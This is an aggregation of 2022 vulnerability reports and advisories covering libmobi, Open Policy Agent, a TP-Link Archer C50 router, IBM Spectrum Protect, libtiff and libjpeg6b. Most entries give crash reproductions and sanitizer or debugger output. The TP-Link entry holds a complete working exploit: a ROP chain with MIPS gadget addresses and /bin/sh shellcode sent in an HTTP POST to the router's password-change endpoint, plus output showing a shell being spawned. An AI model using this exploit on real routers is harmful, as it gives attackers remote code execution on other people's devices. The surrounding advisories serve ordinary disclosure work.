NULL Pointer Dereference in GitHub repository bfabiszewski/libmobi prior to 0.11.

**Description**

NULL Pointer Dereference in function mobi\_build\_opf\_metadata at opf.c:1161 allows attackers to cause a denial of service (application crash) via a crafted input file

**Build**

    git clone https://github.com/bfabiszewski/libmobi.git
    cd libmobi
    
    export CFLAGS="-g -O0 -lpthread -fsanitize=address"
    export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
    export LDFLAGS="-fsanitize=address"
    
    ./autogen.sh
    
    ./configure --disable-shared
    
    make
    

**POC**

    ./tools/mobitool -e -o ./tmp/ ./poc_n.mobi
    
    Title: libmobi ncx test
    Publishing date: 2018-08-07
    Language: en (utf8)
    Dictionary
    __
    Mobi version: 1 (hybrid with version 6)
    Creator software: kindlegen 2.9.0 (mac)
    
    Reconstructing source resources...
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3686533==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff7bde5f5 bp 0x7fffffffbfb0 sp 0x7fffffffb768 T0)
    ==3686533==The signal is caused by a READ memory access.
    ==3686533==Hint: address points to the zero page.
        #0 0x7ffff7bde5f5  /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
        #1 0x483442 in strdup (/home/fuzz/libmobi/tools/mobitool+0x483442)
        #2 0x554adf in mobi_build_opf_metadata /home/fuzz/libmobi/src/opf.c:1161:64
        #3 0x55e2a3 in mobi_build_opf /home/fuzz/libmobi/src/opf.c:1901:20
        #4 0x501166 in mobi_parse_rawml_opt /home/fuzz/libmobi/src/parse_rawml.c:2144:15
        #5 0x4ff78f in mobi_parse_rawml /home/fuzz/libmobi/src/parse_rawml.c:2005:12
        #6 0x4c98d4 in loadfilename /home/fuzz/libmobi/tools/mobitool.c:852:20
        #7 0x4c8b36 in main /home/fuzz/libmobi/tools/mobitool.c:1051:11
        #8 0x7ffff7a7a0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #9 0x41d57d in _start (/home/fuzz/libmobi/tools/mobitool+0x41d57d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
    ==3686533==ABORTING
    
    

poc\_n.mobi

**GDB**

    Breakpoint 1, mobi_build_opf_metadata (opf=0x7fffffffc6c0, m=0x607000000100, rawml=0x6080000000a0) at opf.c:1161
    1161                    opf->metadata->x_meta->dictionary_in_lang[0] = strdup(mobi_get_locale_string(dict_lang_in));
    ─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     0x0000000000554ab2  mobi_build_opf_metadata+12530 mov    0x168(%rbx),%rdi
     0x0000000000554ab9  mobi_build_opf_metadata+12537 callq  0x49d910 <__asan_report_load4>
     0x0000000000554abe  mobi_build_opf_metadata+12542 mov    0x168(%rbx),%rax
     0x0000000000554ac5  mobi_build_opf_metadata+12549 mov    (%rax),%ecx
     0x0000000000554ac7  mobi_build_opf_metadata+12551 mov    %ecx,0x680(%rbx)
    !0x0000000000554acd  mobi_build_opf_metadata+12557 mov    0x680(%rbx),%edi
     0x0000000000554ad3  mobi_build_opf_metadata+12563 callq  0x5158a0 <mobi_get_locale_string>
     0x0000000000554ad8  mobi_build_opf_metadata+12568 mov    %rax,%rdi
     0x0000000000554adb  mobi_build_opf_metadata+12571 callq  0x483400 <strdup>
     0x0000000000554ae0  mobi_build_opf_metadata+12576 mov    0x6d0(%rbx),%rdx
    ─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [1] break at 0x0000000000554acd in opf.c:1161 for opf.c:1161 hit 1 time
    ─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
        rax 0x0000602000000ef0     rbx 0x00007fffffffbfa0     rcx 0x00000000007f0000    rdx 0x00000c04000001de    rsi 0x00000ffffffff804    rdi 0x000061d000003200    rbp 0x00007fffffffc690    rsp 0x00007fffffffbf60        r8 0x00000c0e00000024
         r9 0x0000000000000002     r10 0x0000000000000040     r11 0x0000000000000001    r12 0x000000000041d550    r13 0x00007fffffffe400    r14 0x00006080000000a0    r15 0x0000000000000000    rip 0x0000000000554acd    eflags [ CF PF AF SF IF ]
         cs 0x00000033              ss 0x0000002b              ds 0x00000000             es 0x00000000             fs 0x00000000             gs 0x00000000
    ─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     1156                  if (opf->metadata->x_meta->dictionary_in_lang == NULL) {
     1157                      debug_print("%s\n", "Memory allocation failed");
     1158                      return MOBI_MALLOC_FAILED;
     1159                  }
     1160                  uint32_t dict_lang_in = *m->mh->dict_input_lang;
    !1161                  opf->metadata->x_meta->dictionary_in_lang[0] = strdup(mobi_get_locale_string(dict_lang_in));
     1162              }
     1163          }
     1164          if (opf->metadata->x_meta->dictionary_out_lang == NULL) {
     1165              if (m->mh && m->mh->dict_output_lang) {
    ─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [0] from 0x0000000000554acd in mobi_build_opf_metadata+12557 at opf.c:1161
    [1] from 0x000000000055e2a4 in mobi_build_opf+436 at opf.c:1901
    [2] from 0x0000000000501167 in mobi_parse_rawml_opt+6599 at parse_rawml.c:2144
    [3] from 0x00000000004ff790 in mobi_parse_rawml+96 at parse_rawml.c:2005
    [4] from 0x00000000004c98d5 in loadfilename+2613 at mobitool.c:852
    [5] from 0x00000000004c8b37 in main+5959 at mobitool.c:1051
    ─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [1] id 3795174 name mobitool from 0x0000000000554acd in mobi_build_opf_metadata+12557 at opf.c:1161
    ─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    arg opf = 0x7fffffffc6c0: {metadata = 0x603000000e50,manifest = 0x0,spine = 0x0,guide = 0x0}, m = 0x607000000100: {use_kf8 = true,kf8_boundary_offset = 11,drm_key = 0x0,ph = 0x608000000020,…, rawml = 0x6080000000a0: {version = 1,fdst = 0x0,skel = 0x0,frag = 0x0,guide = 0x0,ncx = 0x608000000…
    loc dict_lang_in = 8323072
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    >>> p mobi_get_locale_string(dict_lang_in)
    $1 = 0x0
    

**Impact**

NULL Pointer Dereference in function mobi\_build\_opf\_metadata at opf.c:1161 allows attackers to cause a denial of service (application crash) via a crafted input file

**Occurrences**

opf.c L1161

Call strdup with NULL pointer: strdup(NULL)

CVE-2022-2279: NULL Pointer Dereference in function mobi_build_opf_metadata at opf.c:1161 in libmobi

An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input.

**Denial of service in Open Policy Agent**

Low severity GitHub Reviewed Published Jul 1, 2022 • Updated Jul 6, 2022

GHSA-2m4x-4q9j-w97g: Denial of service in Open Policy Agent 

A stack overflow in the function DM_ In fillobjbystr() of TP-Link Archer C50&A5(US)_V5_200407 allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.

**_**\*Affected version\***_**

**_**\*2. Vulnerability details\***_**

The main reason for the stack overflow vulnerability is in libcmm So library function DM\_ In fillobjbystr(), this function will process the value of key = value returned from the front end. The following describes the propagation path of the vulnerability, taking httpd password modification as an example. Httpd program does not check the length when receiving oldpwd, PWD and name. After using sprintf to splice these variables, the first propagation function is RDP\_ setObj()

Figure 2 vulnerability propagation location 1

This function is called RDP\_ Setobj () calls DM\_ Fillobjbystr() function for the next step.

Figure 3 vulnerability propagation location 2

Then in DM\_ Fillobjbystr() directly calls strncpy to copy the input content into the local variable V26. As shown in Figure 7, the variable size is 1304 and can overflow; At the same time, as shown in Figure 6, the copy length of strncpy is the character length between '=' and '\\ n', which is not limited or checked. Therefore, the copy length is controllable, and there is a stack overflow vulnerability in this position. The second red box here is the test crash location.

Figure 4 overflow position and crash position

Figure 5 controllable copy length

Figure 6 local variable overflow size

**_**\*3. Recurring vulnerabilities and POC\***_**

In order to reproduce the vulnerability, the following steps can be followed:

\\1. Use fat simulation firmware tl-wr902acv3\_ US\_ 0.9.1\_ 0.2. bin

\\2. Attack with the following POC attacks

import requests

headers = {

​ "Host": "192.168.0.1",

​ "User-Agent": "Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0",

​ "Accept": "_/_",

​ "Accept-Language": "en-US,en;q=0.5",

​ "Accept-Encoding": "gzip, deflate",

​ "Content-Type": "text/plain",

​ "Content-Length": "78",

​ "Origin": "http://192.168.0.1",

​ "Connection": "close",

​ "Referer": "http://192.168.0.1/"

}

payload = "a" \* 2048

formdata = "\[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0\]0,3\\r\\nname={}\\r\\noldPwd=admin\\r\\npwd=lys123\\r\\n".format(payload)

url = "http://192.168.0.1/cgi?8"

response = requests.post(url, data=formdata, headers=headers)

print response.text

The reproduction results are as follows:

How to Exploit (exp) In libuclibc-0.9.33.so, find the widget that can jump to the sleep function, and this widget can assign a value to the RA register, which is convenient to control the instruction that the return address points to.

**gadget 1**

.text:000369E4 move $t9, $s0 .text:000369E8 lw $ra, 0x24($sp) .text:000369EC lw $s0, 0x20($sp) .text:000369F0 addiu $a0, 0xC .text:000369F4 jr $t9 .text:000369F8 addiu $sp, 0x28 Look for instructions that can store the stack address in the register. The stack address is the shellcode address.

**gadget 2**

.text:00058894 addiu $a1, $sp, 0x34 .text:00058898 move $t9, $s0 .text:0005889C jalr $t9 Jump to stack to execute code.

**gadget 3**

.text:0003FD8C move $t9, $a1 .text:0003FD90 move $a1, $a2 .text:0003FD94 jr $t9 Stack layout

┌─────────────┐◄───── sp │ │ │ │ ├─────────────┤◄───── sp + 0x68 # │ v26 │ ├─────────────┤ │ │ │ │ │ │ │ │ │ │ │ │ ├─────────────┤◄───── sp + 0x580 # 0x5880a764 │ v27 │ ├─────────────┤◄───── sp + 0x584 │ v28 │ ├─────────────┤◄───── sp + 0x588 # sleep │ s0 │ ├─────────────┤ │ │ │ │ ├─────────────┤◄───── sp + 0x5ac # gadget 1 │ ra │ ├─────────────┤◄───── sp1 = sp + 0x5b0 │ │ │ │ ├─────────────┤◄───── sp1 + 0x20 # gadget 3 │ s0 │ ├─────────────┤◄───── sp1 + 0x24 # gadget 2 │ ra │ ├─────────────┤◄───── sp2 = sp1 + 0x28 │ │ │ │ ├─────────────┤◄───── sp2 + 0x34 # shellcode │ shellcode │ └─────────────┘ payload

payload = b'a' \* (0x580 - 0x68) payload += p32(file\_base + 0xa780) # v27 payload += b'b' \* 4 payload += p32(libuclibc\_base + 0x56D20) # s0 payload += b'c' \* (0x5ac - 0x588 - 0x4) payload += p32(libuclibc\_base + gadget\_1) # ra = gadget

payload += b'd' \* 0x20 payload += p32(libuclibc\_base + gadget\_3) payload += p32(libuclibc\_base + gadget\_2) payload += b'e' \* 0x34 result

gef➤ c Continuing. process 444 is executing new program: /bin/busybox Reading /bin/busybox from remote target... Reading /bin/busybox from remote target... Reading /lib/ld-uClibc.so.0 from remote target... Reading /lib/ld-uClibc.so.0 from remote target... exp

**Only after resetting the router or using the router for the first time, can the script work effectively!**

import requests from pwn import \*

headers = { "Host": "192.168.0.1", "User-Agent": "Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "_/_", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/plain", "Content-Length": "78", "Origin": "http://192.168.0.1", "Connection": "close", "Referer": "http://192.168.0.1/" }

libcmm\_base = 0x2b985000 file\_base = 0x58800000 libuclibc\_base = 0x2bcdf000

gadget\_1 = 0x000369E4 gadget\_2 = 0x00058894 gadget\_3 = 0x0003FD8C

shellcode = "\\x66\\x06\\x06\\x24" + "\\xff\\xff\\xd0\\x04" + "\\xff\\xff\\x06\\x28" + "\\xe0\\xff\\xbd\\x27"+ "\\x01\\x10\\xe4\\x27" + "\\x1f\\xf0\\x84\\x24" + "\\xe8\\xff\\xa4\\xaf"+ "\\xec\\xff\\xa0\\xaf" + "\\xe8\\xff\\xa5\\x27"+ "\\xab\\x0f\\x02\\x24" + "\\x0c\\x01\\x01\\x01"+ "/bin/sh"

payload = b'a' \* (0x580 - 0x68) payload += p32(file\_base + 0xa780) # v27 payload += b'b' \* 4 payload += p32(libuclibc\_base + 0x56D20) # s0 payload += b'c' \* (0x5ac - 0x588 - 0x4) payload += p32(libuclibc\_base + gadget\_1) # ra = gadget

payload += b'd' \* 0x20 payload += p32(libuclibc\_base + gadget\_3) payload += p32(libuclibc\_base + gadget\_2) payload += b'e' \* 0x34

payload += shellcode

str\_payload = ""

for p in payload: str\_payload += chr(p)

formdata = "\[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0\]0,3\\r\\nname=admin\\r\\noldPwd=admin\\r\\npwd={}\\r\\n".format(str\_payload)

url = "http://192.168.0.1/cgi?8" response = requests.post(url, data=formdata, headers=headers) print(formdata) print(response.text)

CVE-2022-33087: iot/4.md at main · cilan2/iot

CVE-2022-33082: opa/compile.go at 598176de326025451025225aca53e85708d5f1db · open-policy-agent/opa

IBM Spectrum Protect 8.1.0.0 through 8.1.14.0 dsmcad, dsmc, and dsmcsvc processes incorrectly handle certain read operations on TCP/IP sockets. This can result in a denial of service for IBM Spectrum Protect client operations. IBM X-Force ID: 225348.

CVE-2022-22474: IBM X-Force Exchange

IBM Spectrum Protect Client 8.1.0.0 through 8.1.14.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 225886.

**Security Bulletin**

  

**Summary**

The IBM Spectrum Protect back-up archive client is vulnerable to information disclosure as user credentials are stored in memory in plain text. The back-up archive client is also vulnerable to a denial of service due to certain read operations on TCP/IP sockets.

**Vulnerability Details**

**CVEID:**   CVE-2022-22478  
**DESCRIPTION:**   IBM Spectrum Protect Client stores user credentials in plain clear text which can be read by a local user.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225886 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-22474  
**DESCRIPTION:**   IBM Spectrum Protect dsmcad, dsmc, and dsmcsvc processes incorrectly handle certain read operations on TCP/IP sockets. This can result in a denial of service for IBM Spectrum Protect client operations.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225348 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Spectrum Protect Client

8.1.0.0-8.1.14.0

**Remediation/Fixes**

**NOTE**:  APAR IT40671 was created for CVE-2022-22474.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

29 June 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEQVQ","label":"IBM Spectrum Protect"},"Component":"Client","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF017","label":"Mac OS"},{"code":"PF033","label":"Windows"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"}\],"Version":"8.1","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}}\]

CVE-2022-22478: Information Disclosure and Denial of Service Vulnerabilities in IBM Spectrum Protect Backup-Archive Client (CVE-2022-22478, CVE-2022-22474)

Divide By Zero error in tiffcrop in libtiff 4.4.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f3a5e010.

Summary

There is a FPE error in computeOutputPixelOffsets, tools/tiffcrop.c:5817. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file.

Version

LIBTIFF, Version 4.3.0, commit id 9752dae8 (Sat Apr 23 14:00:48 2022 +0000)

Steps to reproduce

    # CFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer" ./configure --prefix=$PWD/build_asan --disable-shared
    
    # make -j; make install; make clean
    
    # ./build_asan/bin/tiffcrop -R 270  -O auto -P 300.0x300.0 poc /tmp/foo
    =================================================================
    ==1710053==ERROR: AddressSanitizer: FPE on unknown address 0x5589ef8aeef4 (pc 0x5589ef8aeef4 bp 0x7ffe3d41e6e0 sp 0x7ffe3d41e650 T0)
        #0 0x5589ef8aeef3 in computeOutputPixelOffsets /root/programs/libtiff/tools/tiffcrop.c:5818
        #1 0x5589ef89af80 in main /root/programs/libtiff/tools/tiffcrop.c:2440
        #2 0x7fab1a654c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #3 0x5589ef891ab9 in _start (/root/programs/libtiff/build_asan/bin/tiffcrop+0x2bab9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /root/programs/libtiff/tools/tiffcrop.c:5818 in computeOutputPixelOffsets
    ==1710053==ABORTING

Platform

    # uname -a
    Linux 4a409ce47130 5.4.0-70-generic #78~18.04.1-Ubuntu SMP Sat Mar 20 14:10:07 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

poc

Edited Apr 25, 2022 by

CVE-2022-2056: tiffcrop: FPE in computeOutputPixelOffsets, tiffcrop.c:5817 (#415) · Issues · libtiff / libtiff · GitLab

Scheduled maintenance on the database layer will take place on 2022-07-02. We expect GitLab.com to be unavailable for up to 2 hours starting from 06:00 UTC. Kindly follow our status page for updates and read more in our blog post.

*   GitLab.org
*   cves
*   Repository

CVE-2022-2058: 2022/CVE-2022-2058.json · master · GitLab.org / cves · GitLab

There is a FPE error in computeOutputPixelOffsets, tools/tiffcrop.c:5936. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file. This is different from #347.

    # CFLAGS="-g -O0" CXXFLAGS="-g -O0" ./configure --prefix=$PWD/build_orig --disable-shared
    
    # make -j; make install; make clean
    
    # ./build_orig/bin/tiffcrop -R 270 -P 300.0x300.0 poc /tmp/foo
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 2 (0x2) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 12544 (0x3100) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65427 (0xff93) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 32768 (0x8000) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 245 (0xf5) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65407 (0xff7f) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 26003 (0x6593) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 1 (0x1) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 51657 (0xc9c9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 8393 (0x20c9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 60361 (0xebc9) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 59136 (0xe700) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 16448 (0x4040) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 25888 (0x6520) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 1024 (0x400) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65408 (0xff80) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 42 (0x2a) encountered.
    TIFFReadDirectory: Warning, Invalid data type for tag StripOffsets.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 42"; tag ignored.
    TIFFReadDirectory: Warning, TIFF directory is missing required "StripByteCounts" field, calculating from imagelength.
    TIFFAdvanceDirectory: Error fetching directory count.
    loadImage: Image lacks Photometric interpretation tag.
    Floating point exception (core dumped)
    
    (gdb) # bt
    #0  0x000000000041181a in computeOutputPixelOffsets (crop=0x7fffffff8eb0, image=0x7fffffff8c30,
        page=0x7fffffff8c50, sections=0x7fffffff91a0, dump=0x7fffffffb530) at tiffcrop.c:5936
    #1  0x00000000004076d7 in main (argc=0x7, argv=0x7fffffffe688) at tiffcrop.c:2459
    #2  0x00007ffff6749840 in __libc_start_main (main=0x406c6d <main>, argc=0x7, argv=0x7fffffffe688,
        init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe678)
        at ../csu/libc-start.c:291
    #3  0x0000000000402f69 in _start ()

    # uname -a
    Linux 4a409ce47130 5.4.0-70-generic #78~18.04.1-Ubuntu SMP Sat Mar 20 14:10:07 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

CVE-2022-2057: tiffcrop: FPE in computeOutputPixelOffsets, tiffcrop.c:5936 (Different from #347) (#427) · Issues · libtiff / libtiff · GitLab

Ubuntu Security Notice 5497-1 - It was discovered that Libjpeg6b was not properly performing bounds checks when compressing PPM and Targa image files. An attacker could possibly use this issue to cause a denial of service. Chijin Zhou discovered that Libjpeg6b was incorrectly handling the EOF character in input data when generating JPEG files. An attacker could possibly use this issue to force the execution of a large loop, force excessive memory consumption, and cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5497-1June 30, 2022libjpeg6b vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Libjpeg6b.Software Description:- libjpeg6b: library for handling JPEG filesDetails:It was discovered that Libjpeg6b was not properly performing boundschecks when compressing PPM and Targa image files. An attacker couldpossibly use this issue to cause a denial of service.(CVE-2018-11212)Chijin Zhou discovered that Libjpeg6b was incorrectly handling theEOF character in input data when generating JPEG files. An attackercould possibly use this issue to force the execution of a large loop,force excessive memory consumption, and cause a denial of service.(CVE-2018-11813)Sheng Shu and Dongdong She discovered that Libjpeg6b was not properlylimiting the amount of memory being used when it was performingdecompression or multi-pass compression operations. An attacker couldpossibly use this issue to force excessive memory consumption andcause a denial of service. (CVE-2020-14152)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 ESM:   libjpeg62                       6b1-4ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5497-1   CVE-2018-11212, CVE-2018-11213, CVE-2018-11214, CVE-2018-11813,   CVE-2020-14152

Tag

#dos